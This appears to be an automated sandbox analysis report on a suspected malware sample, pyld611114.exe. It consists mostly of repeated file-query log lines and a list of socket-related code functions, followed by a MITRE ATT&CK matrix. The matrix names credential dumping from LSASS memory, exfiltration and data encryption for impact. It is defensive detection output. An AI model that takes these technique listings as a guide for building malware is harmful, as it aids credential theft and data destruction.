Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Desktop\pyld611114.exeCode function: 0_2_00007FF668343EF0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF668343EF0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36D2860 GetUserNameA,GetLastError,_strdup,42_2_00007FFDA36D2860
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3776B40 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket,42_2_00007FFDA3776B40
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA377D7E0 bind,WSAGetLastError,45_2_00007FFDA377D7E0
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA374C620 strchr,strchr,inet_pton,strchr,strtoul,strchr,strtoul,memmove,getsockname,WSAGetLastError,inet_ntop,WSAGetLastError,memmove,htons,bind,WSAGetLastError,getsockname,getsockname,listen,WSAGetLastError,htons,45_2_00007FFDA374C620
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA377D5B2 bind,WSAGetLastError,45_2_00007FFDA377D5B2
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA3776B0D htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,45_2_00007FFDA3776B0D
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA3776B40 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket,45_2_00007FFDA3776B40
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA37378B0 memset,strncmp,strncmp,strchr,inet_pton,htons,strtoul,inet_pton,htons,htons,bind,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,45_2_00007FFDA37378B0

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Native API		1
DLL Side-Loading		1
DLL Side-Loading		1
Disable or Modify Tools		OS Credential Dumping11
System Time Discovery		1
Exploitation of Remote Services		12
Archive Collected Data		1
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
Data Encrypted for Impact
CredentialsDomainsDefault Accounts12
Command and Scripting Interpreter		111
Windows Service		111
Windows Service		1
Deobfuscate/Decode Files or Information		LSASS Memory1
Account Discovery		Remote Desktop ProtocolData from Removable Media22
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Scheduled Task/Job		1
